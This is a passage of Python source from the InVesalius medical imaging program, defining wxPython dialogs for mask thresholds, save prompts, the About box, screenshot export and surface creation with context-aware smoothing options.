        # Mask selection combo
        combo_thresh = wx.ComboBox(self, -1, "", choices= self.thresh_list,
                                   style=wx.CB_DROPDOWN|wx.CB_READONLY)
        combo_thresh.SetSelection(default_index)
        if sys.platform != 'win32':
            combo_thresh.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
        self.combo_thresh = combo_thresh
        # LINE 3: Gradient
        bound_min, bound_max = project.threshold_range
        thresh_min, thresh_max = project.threshold_modes[_("Bone")]
        # Pick a random preset colour; RGB floats scaled to 0-255 plus alpha.
        original_colour = random.choice(const.MASK_COLOUR)
        self.colour = original_colour
        colour = [255*i for i in original_colour]
        colour.append(100)
        gradient = grad.GradientCtrl(self, -1, int(bound_min),
                                     int(bound_max),
                                     int(thresh_min), int(thresh_max),
                                     colour)
        self.gradient = gradient
        # OVERVIEW
        # Sizer that joins content above
        flag_link = wx.EXPAND|wx.GROW|wx.ALL
        flag_button = wx.ALL | wx.EXPAND| wx.GROW
        fixed_sizer = wx.FlexGridSizer(rows=2, cols=2, hgap=10, vgap=10)
        fixed_sizer.AddGrowableCol(0, 1)
        fixed_sizer.AddMany([ (label_mask, 1, flag_link, 5),
                              (text, 1, flag_button, 2),
                              (label_thresh, 1, flag_link, 5),
                              (combo_thresh, 0, flag_button, 1)])#,
                              #(label_quality, 1, flag_link, 5),
                              #(combo_quality, 0, flag_button, 1)])
        # LINE 6: Buttons
        btn_ok = wx.Button(self, wx.ID_OK)
        btn_ok.SetDefault()
        btn_cancel = wx.Button(self, wx.ID_CANCEL)
        btnsizer = wx.StdDialogButtonSizer()
        btnsizer.AddButton(btn_ok)
        btnsizer.AddButton(btn_cancel)
        btnsizer.Realize()
        # OVERVIEW
        # Merge all sizers and checkboxes
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.Add(fixed_sizer, 0, wx.ALL|wx.GROW|wx.EXPAND, 15)
        sizer.Add(gradient, 0, wx.BOTTOM|wx.RIGHT|wx.LEFT|wx.EXPAND|wx.GROW, 20)
        sizer.Add(btnsizer, 0, wx.ALIGN_RIGHT|wx.BOTTOM, 10)
        self.SetSizer(sizer)
        sizer.Fit(self)
        self.Layout()
        self.Bind(grad.EVT_THRESHOLD_CHANGED, self.OnSlideChanged, self.gradient)
        self.combo_thresh.Bind(wx.EVT_COMBOBOX, self.OnComboThresh)
    def OnComboThresh(self, evt):
        """Apply the selected threshold preset to the gradient control."""
        import invesalius.project as prj
        proj = prj.Project()
        (thresh_min, thresh_max) = proj.threshold_modes[evt.GetString()]
        self.gradient.SetMinimun(thresh_min)
        self.gradient.SetMaximun(thresh_max)
    def OnSlideChanged(self, evt):
        """Keep the preset combo in sync with the sliders (falls back to Custom)."""
        import invesalius.project as prj
        thresh_min = self.gradient.GetMinValue()
        thresh_max = self.gradient.GetMaxValue()
        thresh = (thresh_min, thresh_max)
        proj = prj.Project()
        if thresh in proj.threshold_modes.values():
            preset_name = proj.threshold_modes.get_key(thresh)[0]
            index = self.thresh_list.index(preset_name)
            self.combo_thresh.SetSelection(index)
        else:
            index = self.thresh_list.index(_("Custom"))
            self.combo_thresh.SetSelection(index)
    def GetValue(self):
        """Return (mask_name, [thresh_min, thresh_max], colour)."""
        #mask_index = self.combo_mask.GetSelection()
        mask_name = self.text.GetValue()
        thresh_value = [self.gradient.GetMinValue(), self.gradient.GetMaxValue()]
        #quality = const.SURFACE_QUALITY_LIST[self.combo_quality.GetSelection()]
        #fill_holes = self.check_box_holes.GetValue()
        #keep_largest = self.check_box_largest.GetValue()
        #return (mask_index, surface_name, quality, fill_holes, keep_largest)
        return mask_name, thresh_value, self.colour
def InexistentPath(path):
    """Tell the user that *path* does not exist."""
    message = _("%s does not exist.") % (path)
    flags = wx.ICON_INFORMATION | wx.OK
    if sys.platform == 'darwin':
        dialog = wx.MessageDialog(None, "", message, flags)
    else:
        dialog = wx.MessageDialog(None, message, "InVesalius 3", flags)
    dialog.ShowModal()
    dialog.Destroy()
def MissingFilesForReconstruction():
    """Tell the user that 3D reconstruction needs more than one DICOM file."""
    message = _("Please, provide more than one DICOM file for 3D reconstruction")
    flags = wx.ICON_INFORMATION | wx.OK
    if sys.platform == 'darwin':
        dialog = wx.MessageDialog(None, "", message, flags)
    else:
        dialog = wx.MessageDialog(None, message, "InVesalius 3", flags)
    dialog.ShowModal()
    dialog.Destroy()
def SaveChangesDialog(filename, parent):
    """Save-changes prompt; returns 1 (yes), 0 (no) or -1 (cancel).

    *parent* is accepted for interface compatibility but not used.
    """
    previous_cwd = os.path.abspath(".")
    question = _(u"The project %s has been modified.\nSave changes?") % filename
    flags = wx.ICON_QUESTION | wx.YES_NO | wx.CANCEL
    if sys.platform == 'darwin':
        dialog = wx.MessageDialog(None, "", question, flags)
    else:
        dialog = wx.MessageDialog(None, question, "InVesalius 3", flags)
    try:
        answer = dialog.ShowModal()
    except(wx._core.PyAssertionError):  # TODO: FIX win64
        answer = wx.ID_YES
    dialog.Destroy()
    os.chdir(previous_cwd)
    if answer == wx.ID_YES:
        return 1
    if answer == wx.ID_NO:
        return 0
    return -1
def SaveChangesDialog2(filename):
    """Two-option save prompt; returns 1 for yes, 0 for no."""
    previous_cwd = os.path.abspath(".")
    question = _("The project %s has been modified.\nSave changes?") % filename
    if sys.platform == 'darwin':
        dialog = wx.MessageDialog(None, "", question,
                                  wx.ICON_QUESTION | wx.YES_NO)
    else:
        dialog = wx.MessageDialog(None, question, "InVesalius 3",
                                  wx.ICON_QUESTION | wx.YES_NO)
    answer = dialog.ShowModal()
    dialog.Destroy()
    os.chdir(previous_cwd)
    return 1 if answer == wx.ID_YES else 0
def ShowAboutDialog(parent):
    """Build and show the standard wx About box for InVesalius.

    parent: window used only as the device-context owner for text wrapping.
    """
    info = AboutDialogInfo()
    info.Name = "InVesalius"
    info.Version = const.INVESALIUS_VERSION
    info.Copyright = _("(c) 2007-2022 Center for Information Technology Renato Archer - CTI")
    # Description is word-wrapped to 350 px using the parent's DC.
    info.Description = wordwrap(_("InVesalius is a medical imaging program for 3D reconstruction. It uses a sequence of 2D DICOM image files acquired with CT or MRI scanners. InVesalius allows exporting 3D volumes or surfaces as mesh files for creating physical models of a patient's anatomy using additive manufacturing (3D printing) technologies. The software is developed by Center for Information Technology Renato Archer (CTI), National Council for Scientific and Technological Development (CNPq) and the Brazilian Ministry of Health.\n\n InVesalius must be used only for research. The Center for Information Technology Renato Archer is not responsible for damages caused by the use of this software.\n\n Contact: invesalius@cti.gov.br"), 350, wx.ClientDC(parent))

    icon = wx.Icon(os.path.join(inv_paths.ICON_DIR, "invesalius_64x64.ico"),\
            wx.BITMAP_TYPE_ICO)

    info.SetWebSite("https://www.cti.gov.br/invesalius")
    info.SetIcon(icon)

    info.License = _("GNU GPL (General Public License) version 2")

    info.Developers = [u"Paulo Henrique Junqueira Amorim",
                       u"Thiago Franco de Moraes",
                       u"Hélio Pedrini",
                       u"Jorge Vicente Lopes da Silva",
                       u"Victor Hugo de Oliveira e Souza (navigator)",
                       u"Renan Hiroshi Matsuda (navigator)",
                       u"André Salles Cunha Peres (navigator)",
                       u"Oswaldo Baffa Filho (navigator)",
                       u"Tatiana Al-Chueyr (former)",
                       u"Guilherme Cesar Soares Ruppert (former)",
                       u"Fabio de Souza Azevedo (former)",
                       u"Bruno Lara Bottazzini (contributor)",
                       u"Olly Betts (patches to support wxPython3)"]

    info.Translators = [u"Alex P. Natsios",
                        u"Alicia Perez",
                        u"Anderson Antonio Mamede da Silva",
                        u"Andreas Loupasakis",
                        u"Angelo Pucillo",
                        u"Annalisa Manenti",
                        u"Cheng-Chia Tseng",
                        u"Dan",
                        u"DCamer",
                        u"Dimitris Glezos",
                        u"Eugene Liscio",
                        u"Frédéric Lopez",
                        u"Florin Putura",
                        u"Fri",
                        u"Jangblue",
                        u"Javier de Lima Moreno",
                        u"Kensey Okinawa",
                        u"Maki Sugimoto",
                        u"Mario Regino Moreno Guerra",
                        u"Massimo Crisantemo",
                        u"Nikolai Guschinsky",
                        u"Nikos Korkakakis",
                        u"Raul Bolliger Neto",
                        u"Sebastian Hilbert",
                        u"Semarang Pari",
                        u"Silvério Santos",
                        u"Vasily Shishkin",
                        u"Yohei Sotsuka",
                        u"Yoshihiro Sato"]

    #info.DocWriters = ["Fabio Francisco da Silva (PT)"]

    info.Artists = [u"Otavio Henrique Junqueira Amorim"]

    # Then we call AboutBox providing its info object
    AboutBox(info)
def ShowSavePresetDialog(default_filename="raycasting"):
    """Prompt for a name under which to save the current raycasting preset.

    default_filename: kept for interface compatibility (currently unused
    by this dialog).

    Returns the name entered by the user, or None if the dialog was
    cancelled.
    """
    dlg = wx.TextEntryDialog(None,
                             _("Save raycasting preset as:"),
                             "InVesalius 3")
    filename = None
    try:
        if dlg.ShowModal() == wx.ID_OK:
            filename = dlg.GetValue()
    except(wx._core.PyAssertionError):  # TODO: FIX win64
        filename = dlg.GetValue()
    finally:
        # Fix: the dialog was previously leaked (never destroyed).
        dlg.Destroy()

    return filename
class NewSurfaceDialog(wx.Dialog):
    """Dialog asking for the parameters of a new surface: name, reference
    mask, quality, and the fill-holes / keep-largest-region options."""

    def __init__(self, parent=None, ID=-1, title="InVesalius 3", size=wx.DefaultSize,
            pos=wx.DefaultPosition, style=wx.DEFAULT_DIALOG_STYLE,
            useMetal=False):
        # Local imports to avoid import cycles at module load time.
        import invesalius.constants as const
        import invesalius.data.surface as surface
        import invesalius.project as prj

        wx.Dialog.__init__(self, parent, ID, title, pos, (500,300), style)
        self.SetExtraStyle(wx.DIALOG_EX_CONTEXTHELP)
        self.CenterOnScreen()

        # This extra style can be set after the UI object has been created.
        if 'wxMac' in wx.PlatformInfo and useMetal:
            self.SetExtraStyle(wx.DIALOG_EX_METAL)
            self.CenterOnScreen()

        # LINE 1: Surface name (pre-filled with the next default name)
        label_surface = wx.StaticText(self, -1, _("New surface name:"))

        default_name = const.SURFACE_NAME_PATTERN %(surface.Surface.general_index+2)

        text = wx.TextCtrl(self, -1, "", size=(80,-1))
        text.SetHelpText(_("Name the surface to be created"))
        text.SetValue(default_name)
        self.text = text

        # LINE 2: Mask of reference

        # Informative label
        label_mask = wx.StaticText(self, -1, _("Mask of reference:"))

        # Retrieve existing masks
        project = prj.Project()
        index_list = sorted(project.mask_dict.keys())
        self.mask_list = [project.mask_dict[index].name for index in index_list]

        # Mask selection combo (defaults to the last mask)
        combo_mask = wx.ComboBox(self, -1, "", choices= self.mask_list,
                                 style=wx.CB_DROPDOWN|wx.CB_READONLY)
        combo_mask.SetSelection(len(self.mask_list)-1)
        if sys.platform != 'win32':
            combo_mask.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
        self.combo_mask = combo_mask

        # LINE 3: Surface quality
        label_quality = wx.StaticText(self, -1, _("Surface quality:"))

        choices = const.SURFACE_QUALITY_LIST
        style = wx.CB_DROPDOWN|wx.CB_READONLY
        combo_quality = wx.ComboBox(self, -1, "",
                                    choices= choices,
                                    style=style)
        combo_quality.SetSelection(3)
        if sys.platform != 'win32':
            combo_quality.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
        self.combo_quality = combo_quality

        # OVERVIEW
        # Sizer that joins content above
        flag_link = wx.EXPAND|wx.GROW|wx.ALL
        flag_button = wx.ALL | wx.EXPAND| wx.GROW

        fixed_sizer = wx.FlexGridSizer(rows=2, cols=2, hgap=10, vgap=0)
        fixed_sizer.AddGrowableCol(0, 1)
        fixed_sizer.AddMany([ (label_surface, 1, flag_link, 5),
                              (text, 1, flag_button, 2),
                              (label_mask, 1, flag_link, 5),
                              (combo_mask, 0, flag_button, 1),
                              (label_quality, 1, flag_link, 5),
                              (combo_quality, 0, flag_button, 1)])

        # LINES 4 and 5: Checkboxes
        check_box_holes = wx.CheckBox(self, -1, _("Fill holes"))
        check_box_holes.SetValue(True)
        self.check_box_holes = check_box_holes
        check_box_largest = wx.CheckBox(self, -1, _("Keep largest region"))
        self.check_box_largest = check_box_largest

        # LINE 6: Buttons
        btn_ok = wx.Button(self, wx.ID_OK)
        btn_ok.SetDefault()
        btn_cancel = wx.Button(self, wx.ID_CANCEL)

        btnsizer = wx.StdDialogButtonSizer()
        btnsizer.AddButton(btn_ok)
        btnsizer.AddButton(btn_cancel)
        btnsizer.Realize()

        # OVERVIEW
        # Merge all sizers and checkboxes
        sizer = wx.BoxSizer(wx.VERTICAL)

        sizer.Add(fixed_sizer, 0, wx.TOP|wx.RIGHT|wx.LEFT|wx.GROW|wx.EXPAND, 20)
        sizer.Add(check_box_holes, 0, wx.RIGHT|wx.LEFT, 30)
        sizer.Add(check_box_largest, 0, wx.RIGHT|wx.LEFT, 30)
        sizer.Add(btnsizer, 0, wx.ALIGN_RIGHT|wx.ALL, 10)

        self.SetSizer(sizer)
        sizer.Fit(self)

    def GetValue(self):
        """Return (mask_index, surface_name, quality, fill_holes, keep_largest)
        as currently selected in the dialog."""
        mask_index = self.combo_mask.GetSelection()
        surface_name = self.text.GetValue()
        quality = const.SURFACE_QUALITY_LIST[self.combo_quality.GetSelection()]
        fill_holes = self.check_box_holes.GetValue()
        keep_largest = self.check_box_largest.GetValue()
        return (mask_index, surface_name, quality, fill_holes, keep_largest)
def ExportPicture(type_=""):
    """Ask the user for a path and image format to save a screenshot.

    type_: label of the view being captured; used in the dialog title and
    the suggested file name.

    Returns (filename, filetype) on confirmation, or an empty tuple if the
    user cancels.
    """
    import invesalius.constants as const
    import invesalius.project as proj

    INDEX_TO_EXTENSION = {0: "bmp", 1: "jpg", 2: "png", 3: "ps", 4:"povray", 5:"tiff"}
    WILDCARD_SAVE_PICTURE = _("BMP image")+" (*.bmp)|*.bmp|"+\
                                _("JPG image")+" (*.jpg)|*.jpg|"+\
                                _("PNG image")+" (*.png)|*.png|"+\
                                _("PostScript document")+" (*.ps)|*.ps|"+\
                                _("POV-Ray file")+" (*.pov)|*.pov|"+\
                                _("TIFF image")+" (*.tif)|*.tif"

    INDEX_TO_TYPE = {0: const.FILETYPE_BMP,
                     1: const.FILETYPE_JPG,
                     2: const.FILETYPE_PNG,
                     3: const.FILETYPE_PS,
                     4: const.FILETYPE_POV,
                     5: const.FILETYPE_TIF}
    # NOTE(review): the extensions for indices 4/5 ("povray"/"tiff") do not
    # match the wildcard patterns (*.pov / *.tif) — confirm which is intended
    # before changing either table.

    utils.debug("ExportPicture")
    project = proj.Project()

    session = ses.Session()
    last_directory = session.get('paths', 'last_directory_screenshot', '')

    project_name = "%s_%s" % (project.name, type_)
    if not sys.platform in ('win32', 'linux2', 'linux'):
        # On other platforms (e.g. macOS) suggest an explicit extension.
        project_name += ".jpg"

    dlg = wx.FileDialog(None,
                        "Save %s picture as..." % type_,
                        last_directory,  # last used directory
                        project_name,    # suggested filename
                        WILDCARD_SAVE_PICTURE,
                        wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
    dlg.SetFilterIndex(1)  # default file type is JPG (filter index 1)

    result = ()
    if dlg.ShowModal() == wx.ID_OK:
        filetype_index = dlg.GetFilterIndex()
        filetype = INDEX_TO_TYPE[filetype_index]
        extension = INDEX_TO_EXTENSION[filetype_index]
        filename = dlg.GetPath()

        # Remember the directory for the next screenshot.
        session['paths']['last_directory_screenshot'] = os.path.split(filename)[0]
        session.WriteSessionFile()

        if sys.platform != 'win32':
            # Append the extension if the user did not type one.
            if filename.split(".")[-1] != extension:
                filename = filename + "." + extension
        result = (filename, filetype)

    # Fix: the dialog was previously leaked (never destroyed).
    dlg.Destroy()
    return result
class SurfaceDialog(wx.Dialog):
    """Surface generation options for an edited mask.

    Shown only when the mask whose surface will be generated was edited.
    The available options are the generation method (Binary or
    'Context aware smoothing') and the parameters of the latter.
    """

    def __init__(self):
        wx.Dialog.__init__(self, None, -1, _('Surface generation options'))
        self._build_widgets()
        self.CenterOnScreen()

    def _build_widgets(self):
        # Method selection panel; the mask is considered edited here.
        self.ca = SurfaceMethodPanel(self, -1, True)

        ok_button = wx.Button(self, wx.ID_OK)
        cancel_button = wx.Button(self, wx.ID_CANCEL)
        button_sizer = wx.StdDialogButtonSizer()
        button_sizer.AddButton(ok_button)
        button_sizer.AddButton(cancel_button)
        button_sizer.Realize()

        self.main_sizer = wx.BoxSizer(wx.VERTICAL)
        self.main_sizer.Add(self.ca, 0, wx.EXPAND | wx.ALL, 5)
        self.main_sizer.Add(button_sizer, 0, wx.EXPAND | wx.ALL, 5)
        self.SetSizer(self.main_sizer)
        self.Fit()

    def GetOptions(self):
        """Delegate to the method panel's option dict."""
        return self.ca.GetOptions()

    def GetAlgorithmSelected(self):
        """Delegate to the method panel's algorithm identifier."""
        return self.ca.GetAlgorithmSelected()
####################### New surface creation dialog ###########################
class SurfaceCreationDialog(wx.Dialog):
    """Dialog combining the surface creation options panel with the
    surface creation method panel, side by side."""

    def __init__(self, parent=None, ID=-1, title=_(u"Surface creation"),
                 size=wx.DefaultSize, pos=wx.DefaultPosition,
                 style=wx.DEFAULT_DIALOG_STYLE, useMetal=False,
                 mask_edited=False):
        wx.Dialog.__init__(self, parent, ID, title, pos, size, style)
        self.SetExtraStyle(wx.DIALOG_EX_CONTEXTHELP)

        if 'wxMac' in wx.PlatformInfo and useMetal:
            self.SetExtraStyle(wx.DIALOG_EX_METAL)

        self.CenterOnScreen()

        # The static box must be created before its children widgets,
        # otherwise on Mac OS X the mouse cannot interact with them.
        sb_nsd = wx.StaticBox(self, -1, _('Surface creation options'))

        self.nsd = SurfaceCreationOptionsPanel(self, -1)
        # Re-check which methods are allowed whenever the mask changes.
        self.nsd.Bind(EVT_MASK_SET, self.OnSetMask)
        surface_options_sizer = wx.StaticBoxSizer(sb_nsd, wx.VERTICAL)
        surface_options_sizer.Add(self.nsd, 1, wx.EXPAND|wx.ALL, 5)

        sb_ca = wx.StaticBox(self, -1, _('Surface creation method'))
        self.ca = SurfaceMethodPanel(self, -1, mask_edited)
        surface_method_sizer = wx.StaticBoxSizer(sb_ca, wx.VERTICAL)
        surface_method_sizer.Add(self.ca, 1, wx.EXPAND|wx.ALL, 5)

        btn_ok = wx.Button(self, wx.ID_OK)
        btn_ok.SetDefault()
        btn_cancel = wx.Button(self, wx.ID_CANCEL)

        btnsizer = wx.StdDialogButtonSizer()
        btnsizer.AddButton(btn_ok)
        btnsizer.AddButton(btn_cancel)
        btnsizer.Realize()

        sizer_panels = wx.BoxSizer(wx.HORIZONTAL)
        sizer_panels.Add(surface_options_sizer, 0, wx.EXPAND|wx.ALL, 5)
        sizer_panels.Add(surface_method_sizer, 0, wx.EXPAND|wx.ALL, 5)

        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.Add(sizer_panels, 0, wx.ALIGN_RIGHT|wx.ALL, 5)
        sizer.Add(btnsizer, 0, wx.ALIGN_RIGHT|wx.ALL, 5)

        self.SetSizer(sizer)
        sizer.Fit(self)

    def OnSetMask(self, evt):
        """A different reference mask was picked: refresh the list of
        allowed methods depending on whether it was edited."""
        import invesalius.project as proj
        mask = proj.Project().mask_dict[evt.mask_index]
        self.ca.mask_edited = mask.was_edited
        self.ca.ReloadMethodsOptions()

    def GetValue(self):
        """Return {"method": ..., "options": ...} from both panels."""
        return {"method": self.ca.GetValue(),
                "options": self.nsd.GetValue()}
class SurfaceCreationOptionsPanel(wx.Panel):
    """Panel with the generic surface creation options: name, reference
    mask, quality and the hole-filling / keep-largest checkboxes.

    Fires a MaskEvent (myEVT_MASK_SET) whenever the selected mask changes.
    """

    def __init__(self, parent, ID=-1):
        # Local imports to avoid import cycles at module load time.
        import invesalius.constants as const
        import invesalius.data.surface as surface
        import invesalius.project as prj
        import invesalius.data.slice_ as slc

        wx.Panel.__init__(self, parent, ID)

        # LINE 1: Surface name (pre-filled with the next default name)
        label_surface = wx.StaticText(self, -1, _("New surface name:"))

        default_name = const.SURFACE_NAME_PATTERN %(surface.Surface.general_index+2)

        text = wx.TextCtrl(self, -1, "", size=(80,-1))
        text.SetHelpText(_("Name the surface to be created"))
        text.SetValue(default_name)
        self.text = text

        # LINE 2: Mask of reference

        # Informative label
        label_mask = wx.StaticText(self, -1, _("Mask of reference:"))

        #Retrieve existing masks
        project = prj.Project()
        index_list = project.mask_dict.keys()
        self.mask_list = [project.mask_dict[index].name for index in sorted(index_list)]

        # Pre-select the mask currently shown in the slice viewer.
        active_mask = 0
        for idx in project.mask_dict:
            if project.mask_dict[idx] is slc.Slice().current_mask:
                active_mask = idx
                break

        # Mask selection combo
        combo_mask = wx.ComboBox(self, -1, "", choices= self.mask_list,
                                 style=wx.CB_DROPDOWN|wx.CB_READONLY)
        combo_mask.SetSelection(active_mask)
        combo_mask.Bind(wx.EVT_COMBOBOX, self.OnSetMask)
        if sys.platform != 'win32':
            combo_mask.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
        self.combo_mask = combo_mask

        # LINE 3: Surface quality
        label_quality = wx.StaticText(self, -1, _("Surface quality:"))

        choices = const.SURFACE_QUALITY_LIST
        style = wx.CB_DROPDOWN|wx.CB_READONLY
        combo_quality = wx.ComboBox(self, -1, "",
                                    choices= choices,
                                    style=style)
        combo_quality.SetSelection(3)
        if sys.platform != 'win32':
            combo_quality.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
        self.combo_quality = combo_quality

        # OVERVIEW
        # Sizer that joins content above
        flag_link = wx.EXPAND|wx.GROW|wx.ALL
        flag_button = wx.ALL | wx.EXPAND| wx.GROW

        fixed_sizer = wx.FlexGridSizer(rows=3, cols=2, hgap=10, vgap=5)
        fixed_sizer.AddGrowableCol(0, 1)
        fixed_sizer.AddMany([ (label_surface, 1, flag_link, 0),
                              (text, 1, flag_button, 0),
                              (label_mask, 1, flag_link, 0),
                              (combo_mask, 0, flag_button, 0),
                              (label_quality, 1, flag_link, 0),
                              (combo_quality, 0, flag_button, 0)])

        # LINES 4, 5 and 6: Checkboxes
        check_box_border_holes = wx.CheckBox(self, -1, _("Fill border holes"))
        check_box_border_holes.SetValue(False)
        self.check_box_border_holes = check_box_border_holes
        check_box_holes = wx.CheckBox(self, -1, _("Fill holes"))
        check_box_holes.SetValue(False)
        self.check_box_holes = check_box_holes
        check_box_largest = wx.CheckBox(self, -1, _("Keep largest region"))
        self.check_box_largest = check_box_largest

        # OVERVIEW
        # Merge all sizers and checkboxes
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.Add(fixed_sizer, 0, wx.TOP|wx.RIGHT|wx.LEFT|wx.GROW|wx.EXPAND, 5)
        sizer.Add(check_box_border_holes, 0, wx.RIGHT|wx.LEFT, 5)
        sizer.Add(check_box_holes, 0, wx.RIGHT|wx.LEFT, 5)
        sizer.Add(check_box_largest, 0, wx.RIGHT|wx.LEFT, 5)

        self.SetSizer(sizer)
        sizer.Fit(self)

    def OnSetMask(self, evt):
        """Forward the combo selection as a MaskEvent to the parent."""
        new_evt = MaskEvent(myEVT_MASK_SET, -1, self.combo_mask.GetSelection())
        self.GetEventHandler().ProcessEvent(new_evt)

    def GetValue(self):
        """Return the selected options as a dict consumed by the surface
        creation code ("overwrite" is always False here)."""
        mask_index = self.combo_mask.GetSelection()
        surface_name = self.text.GetValue()
        quality = const.SURFACE_QUALITY_LIST[self.combo_quality.GetSelection()]
        fill_border_holes = self.check_box_border_holes.GetValue()
        fill_holes = self.check_box_holes.GetValue()
        keep_largest = self.check_box_largest.GetValue()
        return {"index": mask_index,
                "name": surface_name,
                "quality": quality,
                "fill_border_holes": fill_border_holes,
                "fill": fill_holes,
                "keep_largest": keep_largest,
                "overwrite": False}
class CAOptions(wx.Panel):
    '''
    Options related to Context aware algorithm:
    Angle: The min angle to a vertex to be considered a staircase vertex;
    Max distance: The max distance a normal vertex must be to calculate its
    weighting;
    Min Weighting: The min weight a vertex must have;
    Steps: The number of iterations the smoothing algorithm have to do.
    '''
    def __init__(self, parent):
        wx.Panel.__init__(self, parent, -1)
        self._build_widgets()

    def _build_widgets(self):
        """Create the four spin controls and lay them out in a 4x2 grid
        inside an 'Options' static box."""
        sb = wx.StaticBox(self, -1, _('Options'))

        # Angle in [0, 1] (see class docstring), default 0.7.
        self.angle = InvFloatSpinCtrl(self, -1, value=0.7, min_value=0.0,
                                      max_value=1.0, increment=0.1,
                                      digits=1)

        # Max distance in [0, 100], default 3.0.
        self.max_distance = InvFloatSpinCtrl(self, -1, value=3.0, min_value=0.0,
                                             max_value=100.0, increment=0.1,
                                             digits=2)

        # Min weight in [0, 1], default 0.5.
        self.min_weight = InvFloatSpinCtrl(self, -1, value=0.5, min_value=0.0,
                                           max_value=1.0, increment=0.1,
                                           digits=1)

        # Number of smoothing iterations, default 10.
        self.steps = InvSpinCtrl(self, -1, value=10, min_value=1, max_value=100)

        layout_sizer = wx.FlexGridSizer(rows=4, cols=2, hgap=5, vgap=5)
        layout_sizer.Add(wx.StaticText(self, -1, _(u'Angle:')), 0, wx.EXPAND)
        layout_sizer.Add(self.angle, 0, wx.EXPAND)
        layout_sizer.Add(wx.StaticText(self, -1, _(u'Max. distance:')), 0, wx.EXPAND)
        layout_sizer.Add(self.max_distance, 0, wx.EXPAND)
        layout_sizer.Add(wx.StaticText(self, -1, _(u'Min. weight:')), 0, wx.EXPAND)
        layout_sizer.Add(self.min_weight, 0, wx.EXPAND)
        layout_sizer.Add(wx.StaticText(self, -1, _(u'N. steps:')), 0, wx.EXPAND)
        layout_sizer.Add(self.steps, 0, wx.EXPAND)

        self.main_sizer = wx.StaticBoxSizer(sb, wx.VERTICAL)
        self.main_sizer.Add(layout_sizer, 0, wx.EXPAND | wx.ALL, 5)
        self.SetSizer(self.main_sizer)
class SurfaceMethodPanel(wx.Panel):
    '''
    This dialog is only shown when the mask whose surface will be generate was
    edited. So far, the only options available are the choice of method to
    generate the surface, Binary or `Context aware smoothing', and options from
    `Context aware smoothing'
    '''
    def __init__(self, parent, id, mask_edited=False):
        wx.Panel.__init__(self, parent, id)

        self.mask_edited = mask_edited
        # Maps the translated label shown in the combo to the internal
        # algorithm identifier.
        self.alg_types = {_(u'Default'): 'Default',
                          _(u'Context aware smoothing'): 'ca_smoothing',
                          _(u'Binary'): 'Binary'}
        # Methods that cannot be used when the mask was manually edited.
        self.edited_imp = [_(u'Default'), ]

        self._build_widgets()
        self._bind_wx()

    def _build_widgets(self):
        self.ca_options = CAOptions(self)

        self.cb_types = wx.ComboBox(self, -1, _(u'Default'),
                                    choices=[i for i in sorted(self.alg_types)
                                             if not (self.mask_edited and i in self.edited_imp)],
                                    style=wx.CB_READONLY)
        w, h = self.cb_types.GetSize()
        # Fix: wx.Size components must be ints; h * 0.8 is a float and
        # raises TypeError on modern wxPython builds.
        icon = wx.ArtProvider.GetBitmap(wx.ART_INFORMATION, wx.ART_MESSAGE_BOX,
                                        (int(h * 0.8), int(h * 0.8)))
        self.bmp = wx.StaticBitmap(self, -1, icon)
        self.bmp.SetToolTip(_("It is not possible to use the Default method because the mask was edited."))

        self.method_sizer = wx.BoxSizer(wx.HORIZONTAL)
        self.method_sizer.Add(wx.StaticText(self, -1, _(u'Method:')), 0,
                              wx.EXPAND | wx.ALL, 5)
        self.method_sizer.Add(self.cb_types, 1, wx.EXPAND)
        self.method_sizer.Add(self.bmp, 0, wx.EXPAND|wx.ALL, 5)

        self.main_sizer = wx.BoxSizer(wx.VERTICAL)
        self.main_sizer.Add(self.method_sizer, 0, wx.EXPAND | wx.ALL, 5)
        self.main_sizer.Add(self.ca_options, 0, wx.EXPAND | wx.ALL, 5)

        self.SetSizer(self.main_sizer)
        self.Layout()
        self.Fit()

        # For an edited mask, force 'Context aware smoothing' and show the
        # info icon explaining why 'Default' is unavailable.
        if self.mask_edited:
            self.cb_types.SetValue(_(u'Context aware smoothing'))
            self.ca_options.Enable()
            self.method_sizer.Show(self.bmp)
        else:
            self.ca_options.Disable()
            self.method_sizer.Hide(self.bmp)

    def _bind_wx(self):
        self.cb_types.Bind(wx.EVT_COMBOBOX, self._set_cb_types)

    def _set_cb_types(self, evt):
        # The CA options only make sense for the ca_smoothing method.
        if self.alg_types[evt.GetString()] == 'ca_smoothing':
            self.ca_options.Enable()
        else:
            self.ca_options.Disable()
        evt.Skip()

    def GetAlgorithmSelected(self):
        """Return the internal identifier of the selected algorithm."""
        try:
            return self.alg_types[self.cb_types.GetValue()]
        except KeyError:
            # Bug fix: self.alg_types is keyed by translated labels, so the
            # old fallback `self.alg_types[0]` raised KeyError itself.
            # Fall back to the default algorithm identifier instead.
            return 'Default'

    def GetOptions(self):
        """Return the CA parameter dict for ca_smoothing, else {}."""
        if self.GetAlgorithmSelected() == 'ca_smoothing':
            options = {'angle': self.ca_options.angle.GetValue(),
                       'max distance': self.ca_options.max_distance.GetValue(),
                       'min weight': self.ca_options.min_weight.GetValue(),
                       'steps': self.ca_options.steps.GetValue()}
        else:
            options = {}
        return options

    def GetValue(self):
        """Return {"algorithm": ..., "options": ...}."""
        algorithm = self.GetAlgorithmSelected()
        options = self.GetOptions()

        return {"algorithm": algorithm,
                "options": options}

    def ReloadMethodsOptions(self):
        """Rebuild the method list after self.mask_edited changed."""
        self.cb_types.Clear()
        self.cb_types.AppendItems([i for i in sorted(self.alg_types)
                                   if not (self.mask_edited and i in self.edited_imp)])
        if self.mask_edited:
            self.cb_types.SetValue(_(u'Context aware smoothing'))
            self.ca_options.Enable()
            self.method_sizer.Show(self.bmp)
        else:
            self.cb_types.SetValue(_(u'Default'))
            self.ca_options.Disable()
            self.method_sizer.Hide(self.bmp)

        self.method_sizer.Layout()
class ClutImagedataDialog(wx.Dialog):
    """Floating dialog hosting the CLUT (colour lookup table) widget used
    to edit the background image's colour/window-level transfer function."""

    def __init__(self, histogram, init, end, nodes=None):
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP)

